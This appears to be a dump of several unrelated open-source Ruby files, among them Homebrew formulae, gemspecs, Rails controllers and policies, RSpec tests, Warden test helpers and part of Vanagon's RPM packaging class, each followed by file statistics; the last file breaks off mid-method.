| 25.366972 | 106 | 0.667993 |
62aa3362c8342d22cda5fd5fc22918e437cd52e3 | 1,978 | # Copyright (c) 2007-2021 Andy Maleh
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
require 'glimmer/swt/widget_proxy'
require 'glimmer/swt/swt_proxy'
module Glimmer
module SWT
class ScrolledCompositeProxy < Glimmer::SWT::WidgetProxy
def post_initialize_child(child)
auto_exec do
swt_widget.content = child.swt_widget
end
# TODO consider triggering this method in the future upon resizing of content with a listener (on_control_resized)
# child.on_control_resized do
# swt_widget.set_min_size(swt_widget.computeSize(child.bounds.width, child.bounds.height))
# end
end
def post_add_content
calculate_min_size
end
def calculate_min_size
auto_exec do
swt_widget.set_min_size(swt_widget.computeSize(SWTProxy[:default], SWTProxy[:default]))
end
end
alias recalculate_min_size calculate_min_size
end
end
end
| 38.784314 | 122 | 0.737108 |
f7295b684057034994061b5cecbef1838bfff8ce | 772 | Gem::Specification.new do |s|
s.name = 'ultrasoap'
s.version = '0.1.6'
s.summary = "Simple Ruby client library for UltraDNS SOAP API"
s.description = "Connect to Neustar's UltraDNS SOAP API. FKA ultrasoap-ruby. Any feedback or contribution is appreciated."
s.authors = ["Gabriel Sambarino"]
s.email = '[email protected]'
s.files = `git ls-files`.split("\n")
s.homepage = 'https://github.com/chrean/ultrasoap-ruby'
s.license = "MIT"
s.require_paths = ["lib"]
s.required_ruby_version = '~> 2.0'
s.rubyforge_project = s.name
s.license = 'MIT'
s.add_dependency "savon", "~> 2.0"
s.add_dependency "settingslogic", "~> 2.0"
s.add_development_dependency "rspec", "~> 2.10"
end
| 33.565217 | 126 | 0.632124 |
18112c7e2d7b2f7aed41ab480e5a0b79e11368df | 515 | cask "sabnzbd" do
version "3.2.1"
sha256 "d007fd890ddfce91e693cd7b759f48ae9fb01750574108f8354eccd15effae99"
url "https://github.com/sabnzbd/sabnzbd/releases/download/#{version}/SABnzbd-#{version}-osx.dmg",
verified: "github.com/sabnzbd/sabnzbd/"
name "SABnzbd"
desc "Binary newsreader"
homepage "https://sabnzbd.org/"
livecheck do
url :url
strategy :github_latest
end
depends_on macos: ">= :yosemite"
app "SABnzbd.app"
zap trash: "~/Library/Application Support/SABnzbd"
end
| 23.409091 | 99 | 0.72233 |
f802cf9767412041f3c5deff365a7e642259b509 | 309 | require './lib/main'
use Rack::MiniProfiler if ENV.has_key?("PROFILE")
%w{w webdav}.each do |point|
map "/#{point}/" do
run DAV4Rack::Handler.new(resource_class: WebSync::FileResource, root_uri_path: "/#{point}/", log_to: ['log/webdav.log', Logger::DEBUG])
end
end
map '/' do
run WebSync::App
end
| 23.769231 | 140 | 0.676375 |
7a1ec54bba7b6966b06b0c2a11524b6361ae01b3 | 437 | # frozen_string_literal: true
# Be sure to restart your server when you modify this file.
Dummy::Application.config.session_store :cookie_store, key: '_dummy_session'
# Use the database for sessions instead of the cookie-based default,
# which shouldn't be used to store highly confidential information
# (create the session table with "rails generate session_migration")
# Dummy::Application.config.session_store :active_record_store
| 43.7 | 76 | 0.810069 |
e9fc5463d8de1f9df925987ac3a7bfb63e73c1a7 | 1,829 | require "google_drive"
require 'csv'
module Gdrive
class NotFound < RuntimeError; end
class Spread
attr_reader :key
def initialize(ds, key)
@ds = ds
@key = key
@raw = ds.spreadsheet_by_key(key)
end
def raw
@raw or raise NotFound.new("spreadsheet not found: '#{@key}'")
end
def sheet(name)
case name.to_s
when /\A\d+\Z/
Sheet.new(self, name.to_i, nil)
else
Sheet.new(self, nil, name.to_s)
end
end
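# Illustrative usage (the worksheet title is made up):
#
#   spread.sheet("2")         # selects the worksheet at index 2
#   spread.sheet("Expenses")  # selects the worksheet titled "Expenses"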
def sheets
raw.worksheets.map.with_index{|ws, i| Sheet.new(self, i, ws.title, ws)}
end
end
class Sheet
def initialize(spread, index, title, raw = nil)
@spread = spread
@index = index
@title = title
@raw = raw
end
def sp
@spread.raw
end
def raw
@raw ||= sp.worksheet_by_title(@title) if @title
@raw ||= sp.worksheets[@index] if @index
@raw or raise NotFound.new("worksheet not found: '#{@title || @index}'")
end
def title
@title ||= raw.title
end
def attrs
{
"index" => @index,
"title" => @title,
"path" => path,
}
end
def to_s
"#{@index}: #{@title} (#{path})"
end
def path
if @title
"/sheets/%s/%s" % [@spread.key, URI.escape(@title)]
elsif @index
"/sheets/%s/%s" % [@spread.key, @index]
else
nil
end
end
def rows
raw.rows
end
end
def self.config_path!
::File.realpath(ENV['GDRIVE_CONFIG'] || "config.json")
end
def self.new_session
GoogleDrive::Session.from_config(config_path!)
end
def self.spread(key)
Spread.new(new_session, key)
end
end
if $0 == __FILE__
Gdrive.new_session.root_collection
puts "Authorized (#{Gdrive.config_path!})"
end
| 18.29 | 78 | 0.556042 |
e83104729bffca90a1a67080170676c542f33e21 | 216 | # frozen_string_literal: true
class Admin::Search::TextFieldComponent < ViewComponent::Form::TextFieldComponent
self.tag_klass = ActionView::Helpers::Tags::TextField
def html_class
'form-control'
end
end
| 21.6 | 81 | 0.773148 |
18417791d089f43e80818467caedf718b2b3cfb2 | 1,005 | class Gammu < Formula
desc "Command-line utility to control a phone"
homepage "https://wammu.eu/gammu/"
url "https://dl.cihar.com/gammu/releases/gammu-1.37.4.tar.xz"
mirror "https://mirrors.kernel.org/debian/pool/main/g/gammu/gammu_1.37.4.orig.tar.xz"
sha256 "ee345d9e1a06fd055bca8a4b418778a9568178a2c34082e820f86851c535f869"
head "https://github.com/gammu/gammu.git"
bottle do
sha256 "b120f66edf3aa96dd6b934e164753b26dbaaf54bab93cd4996c5604fbbf661e5" => :el_capitan
sha256 "998c00a999450a91711b99534015b6f4ff4f8e48f479420370782b576982e52f" => :yosemite
sha256 "7818e0e49b9a6546a68a12df16fd165e902d5ddf12b41f3a8ee75580da484198" => :mavericks
end
depends_on "cmake" => :build
depends_on "glib" => :recommended
depends_on "openssl"
def install
mkdir "build" do
system "cmake", "..", "-DBASH_COMPLETION_COMPLETIONSDIR:PATH=#{bash_completion}", *std_cmake_args
system "make", "install"
end
end
test do
system bin/"gammu", "--help"
end
end
| 33.5 | 103 | 0.747264 |
7acfb4b98fc61a70a9e0c45417c4d8930f629f72 | 463 | # # encoding: utf-8
# Inspec test for recipe own_cookbook::default
# The Inspec reference, with examples and extensive documentation, can be
# found at http://inspec.io/docs/reference/resources/
unless os.windows?
describe user('root') do
it { should exist }
skip 'This is an example test, replace with your own test.'
end
end
describe port(80) do
it { should_not be_listening }
skip 'This is an example test, replace with your own test.'
end
| 24.368421 | 73 | 0.725702 |
ac921f8687ff6c30ac4b92dba8b053e641e7b113 | 2,421 | # encoding: utf-8
require 'spec_helper'
describe Relation, '#eql?' do
subject { object.eql?(other) }
let(:header) { [[:id, Integer]] }
let(:body) { LazyEnumerable.new([[1]]) }
let(:object) { described_class.new(header, body) }
before do
expect(object).to be_instance_of(described_class)
end
context 'with the same object' do
let(:other) { object }
it { should be(true) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an equivalent object' do
let(:other) { object.dup }
it { should be(true) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an equivalent object of a subclass' do
let(:other) { Class.new(described_class).new(header, body) }
it { should be(false) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an object having a different header' do
let(:other_header) { [[:id, Numeric]] }
let(:other_body) { body }
let(:other) { described_class.new(other_header, other_body) }
it { should be(false) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an object having a different body' do
let(:other_header) { header }
let(:other_body) { LazyEnumerable.new([[2]]) }
let(:other) { described_class.new(other_header, other_body) }
it { should be(false) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
context 'with an object having an equivalent header in a different order' do
let(:attribute1) { [:id, Integer] }
let(:attribute2) { [:name, String] }
let(:header1) { [attribute1, attribute2] }
let(:header2) { [attribute2, attribute1] }
let(:object) { described_class.new(header1, LazyEnumerable.new([[1, 'Dan Kubb']])) }
let(:other) { described_class.new(header2, LazyEnumerable.new([['Dan Kubb', 1]])) }
it { should be(true) }
it 'is symmetric' do
should eql(other.eql?(object))
end
end
end
| 28.482353 | 92 | 0.533251 |
b96fbc968afeff793ae51e99df9b4c98bc580ee5 | 530 | class CalendarController < ApplicationController
add_breadcrumb "Calendar"
def index
@issues_json = Issue.where(issue_status: :open).to_json(methods: [:start_date, :end_date, :text, :url, :color])
@todos_json = current_user.todos.to_json(methods: [:text, :url, :color, :start_date, :end_date])
@weeks_json = Week.joins(:grow).where.not('grows.grow_status': [:done, :aborted]).to_json(methods: [:text, :url, :color])
@observations_json = Observation.all.to_json(methods: [:start_date, :end_date, :text, :url])
end
end | 53 | 123 | 0.728302 |
1ae47a5a0eedbd56a8039de6c096f061562e3b36 | 6,427 | =begin
#Selling Partner API for A+ Content Management
#With the A+ Content API, you can build applications that help selling partners add rich marketing content to their Amazon product detail pages. A+ content helps selling partners share their brand and product story, which helps buyers make informed purchasing decisions. Selling partners assemble content by choosing from content modules and adding images and text.
OpenAPI spec version: 2020-11-01
Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 2.4.26
=end
# Common files
require 'aplus-content-api-model/api_client'
require 'aplus-content-api-model/api_error'
require 'aplus-content-api-model/version'
require 'aplus-content-api-model/configuration'
# Models
require 'aplus-content-api-model/models/aplus_paginated_response'
require 'aplus-content-api-model/models/aplus_response'
require 'aplus-content-api-model/models/asin'
require 'aplus-content-api-model/models/asin_badge'
require 'aplus-content-api-model/models/asin_badge_set'
require 'aplus-content-api-model/models/asin_metadata'
require 'aplus-content-api-model/models/asin_metadata_set'
require 'aplus-content-api-model/models/asin_set'
require 'aplus-content-api-model/models/color_type'
require 'aplus-content-api-model/models/content_badge'
require 'aplus-content-api-model/models/content_badge_set'
require 'aplus-content-api-model/models/content_document'
require 'aplus-content-api-model/models/content_metadata'
require 'aplus-content-api-model/models/content_metadata_record'
require 'aplus-content-api-model/models/content_metadata_record_list'
require 'aplus-content-api-model/models/content_module'
require 'aplus-content-api-model/models/content_module_list'
require 'aplus-content-api-model/models/content_module_type'
require 'aplus-content-api-model/models/content_record'
require 'aplus-content-api-model/models/content_reference_key'
require 'aplus-content-api-model/models/content_reference_key_set'
require 'aplus-content-api-model/models/content_status'
require 'aplus-content-api-model/models/content_sub_type'
require 'aplus-content-api-model/models/content_type'
require 'aplus-content-api-model/models/decorator'
require 'aplus-content-api-model/models/decorator_set'
require 'aplus-content-api-model/models/decorator_type'
require 'aplus-content-api-model/models/error'
require 'aplus-content-api-model/models/error_list'
require 'aplus-content-api-model/models/get_content_document_response'
require 'aplus-content-api-model/models/image_component'
require 'aplus-content-api-model/models/image_crop_specification'
require 'aplus-content-api-model/models/image_dimensions'
require 'aplus-content-api-model/models/image_offsets'
require 'aplus-content-api-model/models/integer_with_units'
require 'aplus-content-api-model/models/language_tag'
require 'aplus-content-api-model/models/list_content_document_asin_relations_response'
require 'aplus-content-api-model/models/marketplace_id'
require 'aplus-content-api-model/models/message_set'
require 'aplus-content-api-model/models/page_token'
require 'aplus-content-api-model/models/paragraph_component'
require 'aplus-content-api-model/models/plain_text_item'
require 'aplus-content-api-model/models/position_type'
require 'aplus-content-api-model/models/post_content_document_approval_submission_response'
require 'aplus-content-api-model/models/post_content_document_asin_relations_request'
require 'aplus-content-api-model/models/post_content_document_asin_relations_response'
require 'aplus-content-api-model/models/post_content_document_request'
require 'aplus-content-api-model/models/post_content_document_response'
require 'aplus-content-api-model/models/post_content_document_suspend_submission_response'
require 'aplus-content-api-model/models/publish_record'
require 'aplus-content-api-model/models/publish_record_list'
require 'aplus-content-api-model/models/search_content_documents_response'
require 'aplus-content-api-model/models/search_content_publish_records_response'
require 'aplus-content-api-model/models/standard_company_logo_module'
require 'aplus-content-api-model/models/standard_comparison_product_block'
require 'aplus-content-api-model/models/standard_comparison_table_module'
require 'aplus-content-api-model/models/standard_four_image_text_module'
require 'aplus-content-api-model/models/standard_four_image_text_quadrant_module'
require 'aplus-content-api-model/models/standard_header_image_text_module'
require 'aplus-content-api-model/models/standard_header_text_list_block'
require 'aplus-content-api-model/models/standard_image_caption_block'
require 'aplus-content-api-model/models/standard_image_sidebar_module'
require 'aplus-content-api-model/models/standard_image_text_block'
require 'aplus-content-api-model/models/standard_image_text_caption_block'
require 'aplus-content-api-model/models/standard_image_text_overlay_module'
require 'aplus-content-api-model/models/standard_multiple_image_text_module'
require 'aplus-content-api-model/models/standard_product_description_module'
require 'aplus-content-api-model/models/standard_single_image_highlights_module'
require 'aplus-content-api-model/models/standard_single_image_specs_detail_module'
require 'aplus-content-api-model/models/standard_single_side_image_module'
require 'aplus-content-api-model/models/standard_tech_specs_module'
require 'aplus-content-api-model/models/standard_text_block'
require 'aplus-content-api-model/models/standard_text_list_block'
require 'aplus-content-api-model/models/standard_text_module'
require 'aplus-content-api-model/models/standard_text_pair_block'
require 'aplus-content-api-model/models/standard_three_image_text_module'
require 'aplus-content-api-model/models/text_component'
require 'aplus-content-api-model/models/text_item'
require 'aplus-content-api-model/models/validate_content_document_asin_relations_response'
# APIs
require 'aplus-content-api-model/api/aplus_content_api'
module AmzSpApi::AplusContentApiModel
class << self
# Customize default settings for the SDK using block.
# AmzSpApi::AplusContentApiModel.configure do |config|
# config.username = "xxx"
# config.password = "xxx"
# end
# If no block given, return the default Configuration object.
def configure
if block_given?
yield(Configuration.default)
else
Configuration.default
end
end
end
end
| 53.558333 | 365 | 0.838961 |
28e29fda0bd1fc18386dc3a0dc3a640e0a18035f | 594 | #!/usr/bin/env ruby
# Makes sure log, log_e, and bench can be overridden.
# (C)2013 Mike Bourgeous
require_relative '../lib/nlhue'
NLHue::Log.on_log do |*args|
puts "OK: Log overridden #{args}"
end
NLHue::Log.on_log_e do |*args|
puts "OK: Log_e overridden #{args}"
end
NLHue::Log.on_bench do |*args, &block|
puts "Benchmark overridden #{args}"
block.call(true)
end
NLHue.log "successfully (not if at start of line)"
NLHue.log_e StandardError.new('an error'), 'indeed (not if at start of line)'
NLHue.bench 'test bench' do |*args|
raise 'Not overridden' unless args[0] == true
end
| 23.76 | 77 | 0.70202 |
1c0fc282491ef1351e45f4b8053545b85b53b4ce | 469 | class ManageAssignments::CoursesController < ApplicationController
def show
@course = CourseCoverage.new(course)
authorize(@course)
if @course.has_coverages?
render :show
else
render :show_without_coverages
end
end
def course
policy_scope(Course).
includes(outcomes: :outcome_coverages).
includes(coverages: :subject).
includes(outcome_coverages: [:assignment, :outcome]).
find(params[:id])
end
end
| 22.333333 | 66 | 0.690832 |
618937d9f9a5fa8677e7827bed42713fc912875a | 2,052 | require "language/node"
class FirebaseCli < Formula
desc "Firebase command-line tools"
homepage "https://firebase.google.com/docs/cli/"
url "https://registry.npmjs.org/firebase-tools/-/firebase-tools-10.0.1.tgz"
sha256 "cfa57ac33a7b81e923ab3712fa5e0c10cc4c514294a4d1aa77442bfca5525df3"
license "MIT"
head "https://github.com/firebase/firebase-tools.git", branch: "master"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "afaf0369360eb7c072a3ef5c0acdc232fd8ab6e4a3c0a63b7fbcc4797119dc76"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "afaf0369360eb7c072a3ef5c0acdc232fd8ab6e4a3c0a63b7fbcc4797119dc76"
sha256 cellar: :any_skip_relocation, monterey: "2f0660812e3575809a192223c0f1ccd8e9c7044f7ce3a97fa261a62c68ee3b44"
sha256 cellar: :any_skip_relocation, big_sur: "2f0660812e3575809a192223c0f1ccd8e9c7044f7ce3a97fa261a62c68ee3b44"
sha256 cellar: :any_skip_relocation, catalina: "2f0660812e3575809a192223c0f1ccd8e9c7044f7ce3a97fa261a62c68ee3b44"
sha256 cellar: :any_skip_relocation, x86_64_linux: "e78107619338a31bf513b3256a79da295a92b739b1d473436ec4c647259f75e2"
end
depends_on "node"
uses_from_macos "expect" => :test
on_macos do
depends_on "macos-term-size"
end
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
term_size_vendor_dir = libexec/"lib/node_modules/firebase-tools/node_modules/term-size/vendor"
term_size_vendor_dir.rmtree # remove pre-built binaries
if OS.mac?
macos_dir = term_size_vendor_dir/"macos"
macos_dir.mkpath
# Replace the vendored pre-built term-size with one we build ourselves
ln_sf (Formula["macos-term-size"].opt_bin/"term-size").relative_path_from(macos_dir), macos_dir
end
end
test do
(testpath/"test.exp").write <<~EOS
spawn #{bin}/firebase login:ci --no-localhost
expect "Paste"
EOS
assert_match "authorization code", shell_output("expect -f test.exp")
end
end
| 40.235294 | 123 | 0.767057 |
bb932d67649f62a036cdbe7b0508f6af013f3455 | 2,406 | # frozen_string_literal: true
require 'types'
require 'dms/main/entities/person'
require 'dms/main/entities/cause'
require 'dms/main/entities/project'
module Dms
module Main
module Entities
class Donation < Dry::Struct
constructor_type :schema
Donation_Types = Types::Strict::String.enum('one-off', 'monthly', 'yearly')
attribute :id, Types::Strict::Int
attribute :correlation_id, Types::Strict::String
attribute :amount, Types::Strict::Int
attribute :currency, Types::Strict::String
attribute :zakat, Types::Bool
attribute :start_date, Types::Strict::Time
attribute :end_date, Types::Strict::Time
attribute :created_at, Types::Strict::Time
attribute :updated_at, Types::Strict::Time
attribute :donation_type, Donation_Types
class WithDonor < Donation
attribute :donor, Entities::Person
def to_json_api
{
'data' => {
'id' => correlation_id,
'type' => 'donations',
'attributes' => attributes,
'relationships' => relationships
}
}.to_json
end
private
def attributes
{
'amount' => amount,
'currency' => currency,
'zakat' => zakat,
'start_date' => start_date,
'end_date' => end_date,
'donation_type' => donation_type
}
end
def relationships
{
'donor' => {
'links' => {
'self' => "http://example.com/donations/#{correlation_id}/relationships/donor",
'related' => "http://example.com/donations/#{correlation_id}/donor"
},
'data' => { 'type' => 'people', 'id' => donor.id }
}
}
end
end
class WithDonorAndCause < Donation
attribute :donor, Entities::Person
attribute :cause, Types::Strict::Array.member(Entities::Cause)
end
class WithDonorAndProject < Donation
attribute :donor, Entities::Person
attribute :cause, Types::Strict::Array.member(Entities::Cause)
attribute :project, Types::Strict::Array.member(Entities::Project)
end
end
end
end
end
| 30.075 | 97 | 0.5399 |
62503fe20609a4558f4c1d093ff788aa9a2e97bf | 3,429 | require File.expand_path('../../../spec_helper', __FILE__)
require File.expand_path('../fixtures/classes', __FILE__)
require File.expand_path('../shared/enumeratorized', __FILE__)
describe "Enumerable#each_slice" do
before :each do
@enum = EnumerableSpecs::Numerous.new(7,6,5,4,3,2,1)
@sliced = [[7,6,5],[4,3,2],[1]]
end
it "passes element groups to the block" do
acc = []
@enum.each_slice(3){|g| acc << g}.should be_nil
acc.should == @sliced
end
it "raises an ArgumentError if there is not a single parameter > 0" do
lambda{ @enum.each_slice(0){} }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(-2){} }.should raise_error(ArgumentError)
lambda{ @enum.each_slice{} }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(2,2){} }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(0) }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(-2) }.should raise_error(ArgumentError)
lambda{ @enum.each_slice }.should raise_error(ArgumentError)
lambda{ @enum.each_slice(2,2) }.should raise_error(ArgumentError)
end
it "tries to convert n to an Integer using #to_int" do
acc = []
@enum.each_slice(3.3){|g| acc << g}.should == nil
acc.should == @sliced
obj = mock('to_int')
obj.should_receive(:to_int).and_return(3)
@enum.each_slice(obj){|g| break g.length}.should == 3
end
it "works when n is >= full length" do
full = @enum.to_a
acc = []
@enum.each_slice(full.length){|g| acc << g}
acc.should == [full]
acc = []
@enum.each_slice(full.length+1){|g| acc << g}
acc.should == [full]
end
it "yields only as much as needed" do
cnt = EnumerableSpecs::EachCounter.new(1, 2, :stop, "I said stop!", :got_it)
cnt.each_slice(2) {|g| break 42 if g[0] == :stop }.should == 42
cnt.times_yielded.should == 4
end
it "returns an enumerator if no block" do
e = @enum.each_slice(3)
e.should be_an_instance_of(Enumerator)
e.to_a.should == @sliced
end
it "gathers whole arrays as elements when each yields multiple" do
multi = EnumerableSpecs::YieldsMulti.new
multi.each_slice(2).to_a.should == [[[1, 2], [3, 4, 5]], [[6, 7, 8, 9]]]
end
describe "when no block is given" do
it "returns an enumerator" do
e = @enum.each_slice(3)
e.should be_an_instance_of(Enumerator)
e.to_a.should == @sliced
end
describe "Enumerable with size" do
describe "returned Enumerator" do
describe "size" do
it "returns the ceil of Enumerable size divided by the argument value" do
enum = EnumerableSpecs::NumerousWithSize.new(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
enum.each_slice(10).size.should == 1
enum.each_slice(9).size.should == 2
enum.each_slice(3).size.should == 4
enum.each_slice(2).size.should == 5
enum.each_slice(1).size.should == 10
end
it "returns 0 when the Enumerable is empty" do
enum = EnumerableSpecs::EmptyWithSize.new
enum.each_slice(10).size.should == 0
end
end
end
end
describe "Enumerable with no size" do
before :all do
@object = EnumerableSpecs::Numerous.new(1, 2, 3, 4)
@method = [:each_slice, 8]
end
it_should_behave_like :enumeratorized_with_unknown_size
end
end
end
| 33.617647 | 87 | 0.631671 |
ed6550d84b85356cf5b8403a158f42e7023eef97 | 2,216 | # Based on https://github.com/ajsharp/warden-rspec-rails
module Warden
# Set of helpers for testing with Warden
module Test
# Warden::Test::ControllerHelpers provides a facility to test controllers in isolation
# Most of the code was extracted from Devise's Devise::TestHelpers.
module ControllerHelpers
def self.included(base)
base.class_eval do
before(:each) do
setup_controller_for_warden
end
before(:each) do
warden
end
end
end
# Override process to consider warden.
def process(*)
# Make sure we always return @response, a la ActionController::TestCase::Behavior#process, even if warden interrupts
_catch_warden { super } || @response
end
# We need to setup the environment variables and the response in the controller
def setup_controller_for_warden
@request.env['action_controller.instance'] = @controller
end
# Quick access to Warden::Proxy.
def warden
@warden ||= begin
manager = Warden::Manager.new(nil, &Rails.application.config.middleware.detect{|m| m.name == 'Warden::Manager'}.block)
@request.env['warden'] = Warden::Proxy.new(@request.env, manager)
end
end
protected
# Catch warden continuations and handle like the middleware would.
# Returns nil when interrupted, otherwise the normal result of the block.
def _catch_warden(&block)
result = catch(:warden, &block)
if result.is_a?(Hash) && !warden.custom_failure? && [email protected](:performed?)
result[:action] ||= :unauthenticated
env = @controller.request.env
env['PATH_INFO'] = "/#{result[:action]}"
env['warden.options'] = result
Warden::Manager._run_callbacks(:before_failure, env, result)
status, headers, body = warden.config[:failure_app].call(env).to_a
@controller.send :render, status: status, text: body,
content_type: headers['Content-Type'], location: headers['Location']
nil
else
result
end
end
end
end
end
| 33.575758 | 128 | 0.625 |
613d9aa0365ae11048dddb78161e61aebf0e9362 | 443 | cask :v1 => 'preference-manager' do
version :latest
sha256 :no_check
url 'http://download.digitalrebellion.com/Pref_Man.dmg'
appcast 'http://www.digitalrebellion.com/rss/appcasts/pref_man_appcast.xml'
name 'Preference Manager'
homepage 'http://www.digitalrebellion.com/prefman'
license :unknown # todo: change license and remove this comment; ':unknown' is a machine-generated placeholder
app 'Preference Manager.app'
end
| 34.076923 | 115 | 0.758465 |
386168c6d5291ed4fd370c50ab846b93c0fb7d12 | 1,197 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'duck_puncher/version'
Gem::Specification.new do |spec|
spec.name = "duck_puncher"
spec.version = DuckPuncher::VERSION
spec.authors = ["Ryan Buckley"]
spec.email = ["[email protected]"]
spec.description = %q{Administer precision punches}
spec.summary = %q{Administer precision extensions (a.k.a "punches") to your favorite Ruby classes}
spec.homepage = "https://github.com/ridiculous/duck_puncher"
spec.license = "MIT"
spec.files = `git ls-files`.split($/).keep_if { |f| f =~ /duck_puncher/ and f !~ %r{test/} }
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test)/})
spec.require_paths = ["lib"]
spec.required_ruby_version = ">= 2.0.0"
spec.add_runtime_dependency "usable", ">= 3.3"
spec.add_development_dependency "bundler", ">= 1.3"
spec.add_development_dependency "rake", '~> 10.1'
spec.add_development_dependency "minitest", '~> 5.0'
spec.add_development_dependency "minitest-reporters", '~> 1.1'
end
| 39.9 | 106 | 0.663325 |
61876a254eda6b059bf87684eefbde80c741850b | 766 | require "rails"
require "action_cable"
require "cable_ready"
require "futurism/engine"
require "futurism/message_verifier"
require "futurism/resolver/resources"
require "futurism/resolver/controller"
require "futurism/resolver/controller/renderer"
require "futurism/channel"
require "futurism/helpers"
module Futurism
extend ActiveSupport::Autoload
autoload :Helpers, "futurism/helpers"
mattr_accessor :skip_in_test, default: false
mattr_writer :default_controller
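  # Resolves the configured controller, falling back to ::ApplicationController
  # when none has been set.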
def self.default_controller
(@@default_controller || "::ApplicationController").to_s.constantize
end
ActiveSupport.on_load(:action_view) do
include Futurism::Helpers
end
mattr_accessor :logger
  self.logger ||= Rails.logger || Logger.new($stdout)
end
| 24.709677 | 72 | 0.787206 |
7994e8a573b243ce1e384c772ac1d01e74aab997 | 260 | require 'virtus'
require 'adamantium'
require "podcast_reader/version"
module PodcastReader
# Your code goes here...
end
require 'podcast_reader/podcast'
require 'podcast_reader/item_node'
require 'podcast_reader/request'
require 'podcast_reader/channel'
| 18.571429 | 34 | 0.807692 |
e9c8a307fff230ec925d3fb709606d26735a41b3 | 393 | class GroceryPolicy < ApplicationPolicy
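  # Grocery items can be listed, viewed, created, and edited by any signed-in
  # user; only the owning user may update or destroy a record.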
def index?
user.present?
end
def show?
user.present?
end
def create?
user.present?
end
def edit?
user.present?
end
def update?
    user.present? && user == item.user
end
def destroy?
    user.present? && user == item.user
end
private
def item
record
end
end
| 12.28125 | 53 | 0.618321 |
f782108d13b3a2e75f01652627130a3ff3d12a71 | 4,908 | class Vanagon
class Platform
class RPM < Vanagon::Platform
# The specific bits used to generate an rpm package for a given project
#
# @param project [Vanagon::Project] project to build an rpm package of
# @return [Array] list of commands required to build an rpm package for the given project from a tarball
def generate_package(project) # rubocop:disable Metrics/AbcSize
target_dir = project.repo ? output_dir(project.repo) : output_dir
target_source_output_dir = project.repo ? source_output_dir(project.repo) : source_output_dir
if project.source_artifacts
rpmbuild = "#{@rpmbuild} -ba"
artifact_copy = "mkdir -p output/#{target_source_output_dir}; cp $(tempdir)/rpmbuild/RPMS/**/*.rpm ./output/#{target_dir}; cp $(tempdir)/rpmbuild/SRPMS/*.rpm ./output/#{target_source_output_dir}"
else
rpmbuild = "#{@rpmbuild} -bb"
artifact_copy = "cp $(tempdir)/rpmbuild/*RPMS/**/*.rpm ./output/#{target_dir}"
end
["bash -c 'mkdir -p $(tempdir)/rpmbuild/{SOURCES,SPECS,BUILD,RPMS,SRPMS}'",
"cp #{project.name}-#{project.version}.tar.gz $(tempdir)/rpmbuild/SOURCES",
"cp file-list-for-rpm $(tempdir)/rpmbuild/SOURCES",
"cp #{project.name}.spec $(tempdir)/rpmbuild/SPECS",
"PATH=/opt/freeware/bin:$$PATH #{rpmbuild} --target #{@architecture} #{rpm_defines} $(tempdir)/rpmbuild/SPECS/#{project.name}.spec",
"mkdir -p output/#{target_dir}",
artifact_copy]
end
# Method to generate the files required to build an rpm package for the project
#
# @param workdir [String] working directory to stage the evaluated templates in
# @param name [String] name of the project
# @param binding [Binding] binding to use in evaluating the packaging templates
# @param project [Vanagon::Project] Vanagon::Project we are building for
def generate_packaging_artifacts(workdir, name, binding, project)
erb_file(File.join(VANAGON_ROOT, "resources/rpm/project.spec.erb"), File.join(workdir, "#{name}.spec"), false, { :binding => binding })
end
# Method to derive the package name for the project
#
# @param project [Vanagon::Project] project to name
# @return [String] name of the rpm package for this project
def package_name(project)
"#{project.name}-#{project.version}-#{project.release}.#{project.noarch ? 'noarch' : @architecture}.rpm"
end
def output_dir(target_repo = "products")
super
end
# Method to derive the directory for source artifacts
#
# @param target_repo [String] repo the source artifacts are targeting
def source_output_dir(target_repo = "products")
@source_output_dir ||= File.join(@os_name, @os_version, target_repo, 'SRPMS')
end
def rpm_defines
defines = %(--define '_topdir $(tempdir)/rpmbuild' )
# RPM doesn't allow dashes in the os_name. This was added to
# convert cisco-wrlinux to cisco_wrlinux
defines << %(--define 'dist .#{dist}')
end
def add_repository(definition) # rubocop:disable Metrics/AbcSize
definition = URI.parse(definition)
commands = ["rpm -q curl > /dev/null || yum -y install curl"]
if definition.scheme =~ /^(http|ftp)/
if File.extname(definition.path) == '.rpm'
# repo definition is an rpm (like puppetlabs-release)
commands << "curl -o local.rpm '#{definition}'; rpm -Uvh local.rpm; rm -f local.rpm"
else
reponame = "#{SecureRandom.hex}-#{File.basename(definition.path)}"
reponame = "#{reponame}.repo" if File.extname(reponame) != '.repo'
if is_cisco_wrlinux?
commands << "curl -o '/etc/yum/repos.d/#{reponame}' '#{definition}'"
else
